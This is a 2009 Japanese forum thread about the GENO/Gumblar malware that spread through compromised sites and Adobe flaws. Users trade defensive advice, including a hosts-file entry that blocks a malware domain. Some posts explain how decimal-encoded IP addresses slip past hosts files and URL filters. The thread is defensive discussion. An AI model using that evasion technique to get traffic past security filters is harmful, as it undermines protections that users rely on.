1 名前:名無しさん@お腹いっぱい。 [2009/06/22(月) 12:15:57 ] ■ adobe readerを最新版にアップデートする ttp://get.adobe.com/jp/reader/ とりあえず最新版にしましょう。 インストール後本体をアップデートしておく事 adobe readerを開いて ヘルプ→アップデートの有無をチェック ■ adobe flashplayerを最新版に更新 ttp://www.adobe.com/go/getflashplayer_jp 以上でGENOは防げるが亜種等のため以下推奨 ■ acrobat javascriptをオフに adobe readerを開いて メニュー→編集→環境設定→javascript→acrobat javascriptを使用のチェックを外す ■ブラウザでスクリプト使用を基本無効に設定 FirefoxにてNoscriptを利用 (Operaでflashオフでもおk([F12]を押す→[プラグインを有効にする]のチェックを外す) (sleipnir、IEでも上手に設定するとなんとかなります) 優先度低 ■ Vistaの人ははUACをONにする ■ hostsファイル書き換え hostsファイルに以下の行を追加 127.0.0.1 martuz.cn hostsファイルの在処 Windows XPの場合→「C:\WINDOWS\system32\drivers\etc」 Windows 2000の場合→「C:\WINNT\system32\drivers\etc」 Windows 95/98/MEの場合→「C:\Windows」 感染が疑わしい人は迷わずクリーンインストール推奨です。 ★Anubisレポート ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html ★GENOウイルスまとめ ttp://www29.atwiki.jp/geno/
139 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 09:52:48 ] >>138 改竄サイトに置かれたjavascriptで攻撃サーバーに誘導しAdobe製品の脆弱性を突いて ウィルスをダウンロードし感染させる攻撃のプロセスを持った一連のウイルス 通称 Gumblar/GENO
140 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 12:25:45 ] Adobeしねよ 糞製品ばっか作りやがって
141 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 14:51:53 ] Reader削除しちゃえばいい
142 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 16:29:15 ] ここでの質問はスレチかな Reader以外のpdf閲覧ツールなら大丈夫な理由は、Readerの脆弱性を突いてるからで 他の閲覧ツールなら問題のpdf開いても大丈夫ってことなんだよね。 もしAっていう閲覧ツールが、Readerの脆弱性のある機能?と同じ機能を持ってたら 当然Aで閲覧するのも危険なんだよね
143 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 16:52:41 ] 同じ機能にAdobeと同じ脆弱性があるかは分からない 実装が違えばない
144 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:36:44 ] >>143 ありがとう。納得した。
145 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 17:37:00 ] iframeも切っとけ
146 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 22:54:28 ] reader削除(flashは有)してOSはVISAでUAC有効、ブラウザはopera(要設定)かfirefox(アドオン、設定必須)で比較的安全か IEは8入れたらえらい事になったから通常用途では二度と使わない 2chブラウザのためにIE7は残しておく
147 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/06(月) 23:44:50 ] >>139 ご丁寧な解説ありがとうございます 検出名より感染プロセスで一括りに されるということでしょうか いずれにしろ大変 勉強になりました
148 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 00:39:24 ] >>147 検出名は内部組成や亜種の生成ルートの推定から行われるもので、検出名はワクチンベンダの一存、系譜の根拠にするものではない 推定される亜種・模倣の系譜でGENOって呼んでるから、感染プロセスで適当に一括りしてるわけではない・・・はず それに、132のレスのID:VmXw78Zk0の言い分を見るに、今までのGENOをカスタムして作られてるからこれも亜種 つっても、感染経路を拡張し、偽装方法を変更し、発症症状を変更し、踏み台を入れ替え、感染経路を新造して、亜種の亜種の亜種って続いてきただろうから、オリジナルの痕跡は残っていない可能性も有るけどな しかし9.1.2+adobe script offでもやっぱり穴があったのか 案の定の結果だが渦中の本家に亜種としてゼロデイやられるとか、Adobe舐められ過ぎワロス 俺はOpera使いだからこそ気楽にプラグイン切り替えられるが、こんな変態ブラウザは一握りだし・・・ もうどうしようもない所まで来てるなぁ・・・
149 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 02:22:17 ] >>148 Adobe以外の脆弱性もついてたみたいだからそっちかもしれないよ
150 名前:名無しさん@お腹いっぱい。 [2009/07/07(火) 02:33:53 ] ウイルスに詳しい方が多いと思うので、教えてください サイトが感染というよりも… レンタルサーバー屋自体が、ウイルス感染したみたいなんです (かなり有名なとこです) これはGENOウイルスなのでしょうか? 上手く説明できないので… 詳しいことは、そのレンタルサーバーのスレッドを見て頂けたらと思います 正直、とても不安です VALUE DOMAINってどうよ? part33 pc11.2ch.net/test/read.cgi/hosting/1246828727/
151 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 03:29:18 ] >>150 はい同類です wikiwikiはこれが原因だったようです アンチウイルスが反応なしでもPCが不安定になったなど 心当たりがある場合はOSの入れなおし推奨 心配な場合も入れなおしどうぞ
152 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 10:27:36 ] >>148 やり口は似ていても、その中で GENOの系譜を継ぐものと継がざるもの ルーツなり経緯なりで明確ではないにしろ一線を画すということでしょうか 大元をたどれば、どこに行き着くかということかもしれませんが…。 自分のような一般の人にとっては危険なことには変わりありませんので >>134 の言うとおり >わかるやつにはわかる でいいのかもしれませんね 可否スレの方たちが新種・亜種・別物と分析なさってくれてますし >>130 今そのレス見ると、カスペがユーザー使用環境で対応してるか 確認の依頼だったかもしれないですね。重ね重ね失礼しました >>149 >Adobe以外の脆弱性 さっき、そのスレ見たら >既知の(パッチ済みの)脆弱性 と誰かが書き込んでました 参照URlは「Microsoft Video ActiveX コントロールの脆弱性」のページでした
153 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 10:39:37 ] 1つはPDF等の脆弱性を突いたもの GENO亜種 1つはActiveXの脆弱性を突いたもの ゼロデイアタック 共通点はいずれも配布元が香港
154 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 10:54:32 ] 前に狩りがどうの正義がどうののスレ 見たことあるけど、それもつながってるの?
155 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 11:13:24 ] IE×Firefox×Opera×Safari×Chrome 最終戦争7回戦 pc12.2ch.net/test/read.cgi/software/1246005705/119
156 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 12:05:12 ] >>151 ありがとうございます 自分のパソコンに関しては、とりあえずクリーンインストールをしようと思います ただ今回、ログインページに仕掛けられてたみたいなので… サイトのファイルを他へ移転できたとしても… サーバーに預けてるドメインを、ログインしないと移管出来ないのがきついですね
157 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 13:22:46 ] おたくのスレにあったレスを頼りに情報たどっていくと このページに行き着くけど、恐いから直リンや止めとくわ ttps://www●value-domain.com/howto/?action=transfer(●は.) 一応view-source:で、おたくのスレの85-86が入ってないのは見た ソース見れるなら自分で確認してほしい。自己責任で
158 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 13:43:10 ] >>152 パッチ済みじゃないよ Microsoft ビデオの ActiveX コントロール脆弱性により、リモートでコードが実行される. www.microsoft.com/japan/technet/security/advisory/972890.mspx 対策方法はこちら support.microsoft.com/kb/972890/ なるべくならIEを使わないほうが良いらしい
159 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 14:08:32 ] >>158 またVISTAは相手にされなかったのか・・・
160 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 14:12:56 ] >>158 誤読してました。ちゃんと未パッチの脆弱性 ってありましたね。お手数をおかけしました
161 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/07(火) 21:50:39 ] >>159 ユーザ少ないし、セキュリティ強めだから手間掛けるまでも無いってか。 それにWindowsUpdateでパッチしにくい脆弱性が発見されていると仮定して、今その穴を使ったら出荷前の普及するだろう7で対策される公算が高いわけで。
162 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 05:41:51 ] 今更だがfirefoxのnoscriptは信頼できないサイトと信頼できるサイトの制限設定が排他処理じゃないなのが問題だな これだと、許可サイトは強制的に全てを許可されるからOSがXPだと少々怖い operaの方が妥当かもしれない 信頼サイトにも個別に制限出来るようにすべき
163 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 11:07:30 ] 本末転倒かも知れんが、NoScriptとAdblockの併用いいよ
164 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 13:55:25 ] NoScript と YesScript を併用すりゃいいんじゃね?
165 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 14:31:17 ] YesScriptは、URLをブラックリスト登録して初めてJavaスクリプトが無効にできる サイトがころころ変ってしまうような場合は無力だよね
166 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 14:37:59 ] Adblockは、直接埋め込まれたjavascriptは無効にできないよね ブロックするのが外部のjsだけなら簡単なんだけどね
167 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 14:48:05 ] >直接埋め込まれたjavascriptは無効にできない あああああああああああああああああああああああああああああああああ
168 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 16:35:37 ] じゃあどうすりゃいいのよ 誰か対策まとめてくれ
169 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:05:33 ] 【韓国】青瓦台、国会、国防部、ネイバーなど25サイトにDDoS攻撃[07/08] takeshima.2ch.net/test/read.cgi/news4plus/1247014272/
170 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:27:59 ] ax.xrea.comが感染か >>168 OSをvistaに変更
171 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:33:21 ] >>168 LANケーブル引っこ抜く
172 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:45:59 ] RequestPolicyは?
173 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:46:58 ] あれ、凄い使い難い
174 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:55:07 ] >>170 XPのパソコンをVistaにアップグレードするのも意外と危険なんだよね うまくインストできてもXPで当たり前のようにできていたことができなくなるし
175 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 17:56:55 ] ha?
176 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 18:04:19 ] >>172 Operaに似たような機能が標準で付いているけれど 動画サイトで使うの大変だよ
177 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/08(水) 18:12:30 ] xreaは今朝アクセスしたら確かにノートン先生が大怒りだったな activeX系だからvistaは対象外だが
178 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 00:22:29 ] おいおい、Adobe関連は全て最新にしてたのに感染したっぽい しかもブラウザどころか最早タスクマネージャすら起動しない始末 どうしろと
179 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 00:56:45 ] 使用OS、ブラウザ、javascriptの有無を まぁ、別件でxreaのようなタイプ(activex経由)なら感染は有り得る
180 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 01:35:54 ] >>178 ActiveXからやられたんだろ
181 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 02:14:46 ] Adobeだけ最新なら別のものじゃないの
182 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 09:08:26 ] >>153
183 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 14:31:38 ] そもそも何に感染したかわかってないようだし 症状的にも今回のもの(新種ではなく旧来のキーロガー)と違う感じなので 別の何かではないかと
184 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/09(木) 19:48:28 ] タスク自体重いのならマザーボードがお逝きになる寸前かもね
185 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/10(金) 01:12:49 ] ディスプレイで虫みたいなのがグルグル動きまくってて何か感染したのかとおもったら 本物の虫だった
186 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/10(金) 02:28:33 ] これが北朝鮮の選択か…米韓への田代砲攻撃、止まる気配なし tsushima.2ch.net/test/read.cgi/news/1247153428/
187 名前:名無しさん@お腹いっぱい。 [2009/07/10(金) 13:58:37 ] xreaのアクセス解析にアクセスしましたが、私のパソコンに感染はしていないみたいです アクセス解析は大丈夫なんでしょうか…。
188 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/10(金) 14:22:12 ] 【アクセス解析】AccessAnalyzer.com Part5【XREA】 pc11.2ch.net/test/read.cgi/hp/1234096306/
189 名前:名無しさん@お腹いっぱい。 [2009/07/11(土) 06:02:29 ] >>188 ここ開いただけでavast!が反応する..ガクガクグルグル
190 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/11(土) 19:28:05 ] もう怖いから夜のエロサイト以外見ないようにする
191 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/11(土) 21:45:15 ] いや、そのエロサイトが危ないんだがwww
192 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/12(日) 00:44:36 ] ファイル共有ソフト「Share」が何者かに攻撃を受けフリーズしまくる 2PB tsushima.2ch.net/test/read.cgi/news/1247162852/
193 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/12(日) 01:46:37 ] 情報もれてもいいシュミ用のパソコン用意すればいいんだよ
194 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/13(月) 11:25:14 ] 廃れた
195 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/13(月) 16:28:31 ] 【share】 sharebot丸の内OCN監視スレ 【洒落】 hideyoshi.2ch.net/test/read.cgi/download/1247399721/
196 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/15(水) 22:33:32 ] 決闘勝利おめwww
197 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/15(水) 22:34:51 ] 誤爆。。
198 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 02:42:31 ] pc11.2ch.net/test/read.cgi/sec/1243346768/686 >javascript単体でどうこうするウィルスは確かにほとんど居ないが、脆弱性自体はあるし、あった。 >ウィルスではないが、XSSなどはjavascript経由で発症する物がほとんどであるし、切る事で安全性は確実に高まります。 実例 ↓ slashdot.jp/security/09/07/15/0449234.shtml Firefox 3.5のJavaScriptエンジンに未対策の脆弱性が発見される。 最近のJavaScript高速化戦争の弊害だな、こりゃ。 素直に実装するだけならそれなりに枯れて安全になってきていた筈だからな。
199 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 12:00:17 ] TraceMonkeyによるJSの高速化も3.5の売りだから 枯れてないのは仕方がない。 3.0(笑)ではChromeのV8に相手すらしてもらえない。
200 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 13:55:16 ] 結局インフルエンザと同じぐらいに収まったな 作ったヤシの全面負けでFA?
201 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 19:24:00 ] genoウイルススレがいくつも立ったのだから作ったやつの勝ちだろ
202 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 19:35:57 ] アフィは儲かったんだろうか ・・・・・あれ?
203 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 19:49:49 ] 買わなきゃ入らないamazonでは厳しい 情弱が来るジャンルでもあんまないし やはりゲームアニメのがいいわ
204 名前:名無しさん@お腹いっぱい。 [2009/07/16(木) 19:50:26 ] 収まっていないようでして・・ パソコンは問題ないようですが HPが何度も改竄されます。 パスワードを変えても、すぐ見破られてしまいます。 どしたらいいんでしょう
205 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 19:51:48 ] そんなやばすぎるHPは一旦閉鎖しろ
206 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 19:57:38 ] まだあんのか、このすれw
207 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 19:57:45 ] >>204 VALUE DOMAINってどうよ? part35 ttp://pc11.2ch.net/test/read.cgi/hosting/1247663722/ 【アクセス解析】AccessAnalyzer.com Part6【XREA】 ttp://pc11.2ch.net/test/read.cgi/hp/1247279199/
208 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 20:16:42 ] 何で今になって
209 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/16(木) 22:17:37 ] >>204 問題ないかどうかは本当に確認した?OS入れなおした? それ以外なら>>207 関連かな
210 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/17(金) 01:38:29 ] >>203 アニオタゲーオタって無知な奴多いのか
211 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/17(金) 02:03:33 ] >>204 感染したままでパス変更してるか、感染したPCで更新作業してるかだろ。 HPは全ファイル削除→PCリカバリ→ftpパス変更→HPにファイル戻し
212 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/17(金) 02:05:32 ] >>210 ガキがくるからな
213 名前:名無しさん@お腹いっぱい。 [2009/07/17(金) 14:26:59 ] アバストが反応してJS:Redirector-H4 [Trj]を検出しましたと出た。 ブロックしてくれたから良かったけど。
214 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/17(金) 14:35:08 ] それは報告しなくていいです
215 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/17(金) 14:49:46 ] 私の戦闘力は530000です
216 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/17(金) 17:39:31 ] 私の愛馬は凶暴です
217 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/18(土) 22:34:41 ] >>215 とっとと本気出せよオカマ野郎
218 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/19(日) 08:56:28 ] アンラボ■■■【アンラボ】V3ウイルスブロック Part6■■■ pc11.2ch.net/test/read.cgi/sec/1207926691/ これきくんだろうか
219 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/19(日) 09:03:51 ] さぁ
220 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/19(日) 18:34:03 ] ウィルスブロック2005を更新するのわすれてて2005のままの私が通ります。
221 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 00:03:17 ] 【GENO】 またFlash Playerの脆弱性を突いたウイルス出現 tsushima.2ch.net/test/read.cgi/news/1248360445/
222 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 02:00:02 ] vistaの一人勝ち まぁ、それくらいのメリットがないと救いようのない地雷OSだからね
223 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 02:07:11 ] マジ糞すぎる Adobe潰せ
224 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 02:10:24 ] Silverlight, XPS の MS の時代を望んでいるんですか?
225 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 02:40:21 ] djvuもたまには思い出してあげてくださいね
226 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 03:42:14 ] silverlightは某動画サイト(現在、閉鎖)にも採用されていたから意外と面白いかもしれんが 開発環境が厳しいらしいな
227 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 18:06:20 ] GenoウイルスNineballとは関係ないんで、スレ違いなんだが、 最近、Firefoxが謎のIPと 暗号化通信 している。 209.134.161.75 なんだが、Whoisにかけると Internet Security Systems とかいう知らないドメインらしい。 気持ち悪すぎるんだが、だれか分かる人いない? ググルと、同名のIBMが買収した組織が存在するようだが、同名ってだけで同じとは考えにくい。 こういうことが質問できるスレでも構わないからアドバイスが欲しいっす。
228 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 18:54:47 ] firefoxじゃなくセキュリティソフトの鯖の可能性があるね
229 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 19:08:52 ] >>228 レスありがとう。 でも、そのセキュリティーソフト(Kaspersky)で>>227 をモニターしているんだ。 それで通信しているアプリがFirefoxだと表示されちゃう。 通信先のサーバーもKasperskyのものではないみたいだし、 googleのセーフブラウジングでも、Firefoxの更新を確認するためにモジラのサイトと通信しているのでもない みたいで気持ちわるいっす。
230 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 19:37:20 ] じゃあ、アドオン、2chブラウザ、無線LAN、メーカー製PCなら常駐アプリがバックグラウンドでアドウェアのような事をやってるとか うちもfirefox3.0.12(OSはvista)だがそういう挙動は一切ないな
231 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 19:50:04 ] >>230 レスありがとう。 Firefox3.0.12で問題ないって情報だけでも助かる。 今は3.51を使っているけど、そっちの環境も残してあるので確認してみる。 一番ヤバイのはFirefoxの通信と偽ってアドウェアが通信していることだよね。 ところで、 >そういう挙動は一切ないな はどうすれば確認できる?
232 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 20:12:15 ] firefoxスレで訊いたら?
233 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/24(金) 22:24:32 ] >>227 >同名のIBMが買収した組織が存在するようだが、同名ってだけで同じとは考えにくい。 考えにくいというのは何で? 正引き逆引き一致でwebapp.iss.netなんだけどあやしいの? アドオン何いれてるの? アドオンなしでもその通信発生するの? P2Pやエロサイト巡回で不審な動作をしたなど心当たりがあるなら 素直にOS入れなおしたほうが安心だと思うよ
234 名前:231 mailto:sage [2009/07/24(金) 23:55:20 ] >>233 わざわざ試してくれてありがとう。 自分でやったら一致しなかったんだ。 おかしいよね。 どこのwhois使っても同じ結果になるはずだけど、 良かったら どこで検索したか教えてくれない? >素直にOS入れなおしたほうが安心だと思うよ 自分もまったくその通りだと思う。 ただ、面倒だから自分の勘違いだったり、まっとうな理由が見つかればいいなぁと思っている。 >P2Pやエロサイト巡回で不審な動作をしたなど心当たりがあるなら 一般的にヤバイとされるサイトには行っていないし、プラグインも全オフ状態。 FirefoxアドオンのNoScriptが"ざる状態"らしいと知った昨日からはJavaScriptも切っている。 ただ、>>230 さんの言うように、3.0.12の時にはこんな通信していなかったはずだと自分も思っていた。 思い当たるきっかけといえば 3.50以降にアップしてから ってことになっちゃう。 もちろん、そのタイミングで何かに感染したのかもしれないけど・・・。 アドオン関連は3.0.12と3.51で同じのしか入れてないから、 3.0.12で試して その後、アドオン全オフの3.51環境を試してみます。 気まぐれに通信開始を試みている感じなので、検証には時間かかると思います。 一番良い結果は、これまでに書いたことが勘違いで、 通信先のInternet Security Systems が安全なサイト プラス 何かのアドオンがそこのデータを利用していることですね。 >>233 さんの書き込みで希望が見えてきました!
235 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 00:06:17 ] >>234 www.cman.jp/network/support/ip.html いい加減スレチだしFirefox関連スレでアドオンさらしたほうが早いと思うけどね
236 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 00:11:29 ] >>235 thankyou!
237 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 04:01:32 ] Noscriptがざるだって初めて聞いたけどFirefox関連でボロクソいわれてるなあ 別のアドオン探すか
238 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 06:31:43 ] Noscriptってザルなの?
239 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 10:29:28 ] おれfirefox関連スレのROM専だけど、向こうでNoScriptをなんやかんや言ってるやつはPC初心者板並のスキルだと思うよ
240 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 12:00:45 ] opera使えよ コピペ禁止スクリプトなんて余裕で貫通する最強ブラウザだ
241 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 15:28:00 ] opensauceなんだからdiffしてくださいな
242 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 20:07:26 ] >>239 スレはみてないけどほかで検証されてるから初心者云々関係ないよ NoScript すり抜けでぐぐればすぐ出てくる
243 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 20:17:17 ] noscriptは許可サイトは丸裸 非許可サイトもIFRAMEをスルーしてしまう問題がある(最新verでも同様) 完全に気休めアドオンだね 本当に信用出来るのはブラウザでもアドオンでもセキュリティソフトでもなくvistaのUAC先生だけ firefoxが駄目ならoperaに移るか!という浅はかな考えを抱いているとXPユーザーは痛い目に合う可能性がある
244 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 22:08:40 ] 安全性だけなら2000でもXPでも制限ユーザーで動かせば同じじゃないか?
245 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 22:23:32 ] 管理者権限をのっとってry
246 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 22:26:57 ] 2749172507/ ↑IEかchromeでアクセスすると変換してsupport.mozilla.com/ja/kb/Live+Bookmarks につながる HostsやURLドメインフィルタでブロックし難いようにしている、敵ながらあっぱれだよな 例えばttp://2749172507/jp.jsのように jp.js などが付いているとうっかり信用して許可サイトに登録してしまう
247 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/25(土) 23:02:29 ] >>242 NoScriptも万能じゃないし、一つに頼り切るのも危険じゃん 「NoScript すり抜け」検索のブログで検証 一応そのブログのIFRAMEは完全にブロックできてた(下記画像Firefox3.5.1) up2.viploader.net/pic/src/viploader1100692.jpg
248 名前:名無しさん@お腹いっぱい。 [2009/07/25(土) 23:46:56 ] >NoScriptも万能じゃない 確かに。
249 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 11:30:16 ] あくまでも補助機能としてnoscript入れてるんだろ 誰もこれさえ入れていれば大丈夫と思ってるやつはいないだろ
250 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 11:34:58 ] >>247 うちもブロック出来てた。 すり抜け現象はそのブログの中の人の設定ミスかなんかじゃないのか。
251 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 11:45:26 ] なんかわからんがよs
252 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 12:21:21 ] >>246 よく分からんが、やばそうなので、 どういうことか詳しくおしえてくれ。
253 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 13:10:39 ] これだとマイクロソフトだと一目でわかる↓ www.microsoft.com/ja/jp/default.aspx これだと解りにくい↓ 3475948030:80/ja/jp/ 上記の両方とも同じサーバーの同ページにつながる ここで、www.microsoft.comが悪意のあるサイトと仮定する。 信頼している、ゲーム・動画サイトでFxのNoscriptが3475948030:80/ja/jp/ をブロックしたとする 一般的にゲームや動画ができるまでセキュリティを弱め許可していくだろう .cn/などのトップレベルドメインなら警戒するが、URL内にjpが入っていると比較的安心な国内鯖などと勘違いして許可してしまう恐れがある。 他には、フィルタリングソフトなどで.com/の全てをブロックしても3475948030:80/ja/jp/ はすり抜けてしまう。 ※上記リンクは全て信頼のマイクロソフトのサイトです。
254 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 13:27:09 ] hosts 127.0.0.1 www.microsoft.com フィルタリングソフト 禁止 www.microsoft.com 及び .com 上記のブロックをしても埋め込まれた3475948030:80/ja/jp/ はすり抜ける まぁ具体的なサンプルでないので解りにくかったかも知れない
255 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 13:36:24 ] ネットもリアルと同じように詐欺が存在する。 VistaUAC、FirefoxNoscriptなどで武装しても罠にかかる人はかかる。 それぞれの特性を理解して使わなくてはいけないということでしょう。
256 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 15:28:48 ] >>250 キャッシュファイルは完全に消してからやった?
257 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 17:16:07 ] だいたいURLが数字ばっかのところに行くか普通
258 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 21:10:41 ] >>257 数字でも英数字でもひらがなでも 普通は行くよ ttp://さだまさし.jp/
259 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 21:13:22 ] マイクロソフト・ホーム tinyurl.com/microsoft-japan
260 名前:名無しさん@お腹いっぱい。 [2009/07/26(日) 21:24:02 ] >>259 GoogleChromeは可、その他不可
261 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 21:25:03 ] >>257-258 ……(^ω^; )
262 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/26(日) 23:18:25 ] Adobe糞が7月中に対策してもまたすぐボロがでると予想
263 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 06:07:39 ] >>258 J-Wordに犯されてるか、 アドレスバーから検索できる設定になってるIEと見た 多分後者だなw
264 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 07:59:30 ] >>263 258は普通に日本語ドメインのことじゃないの?
265 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 08:20:29 ] 日本語ドメインだな
266 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 08:33:02 ] どっちにしろ>>258 は>>257 の言いたかったことがわかってないような
267 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 08:49:40 ] こだわるなよ
268 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 16:56:09 ] >>263 IEは7から日本語ドメインに標準で対応 J-Wordもアドレスバーに文字を入れて日本語URLの検索できるが 普通J-Wordは使わないだろ それと2ちゃんは日本語URLが貼れても機能しないんだよな
269 名前:名無しさん@お腹いっぱい。 mailto:sage [2009/07/27(月) 17:04:27 ] うちのパソコンはNoscript すり抜けはしないけれど、 保険で他にも複数IFRAME対策等を入れているから 一つや二つの対策ソフトがバグっても安心です
270 名前:名無しさん@お腹いっぱい。 [2009/07/27(月) 17:09:26 ] こだわりやな
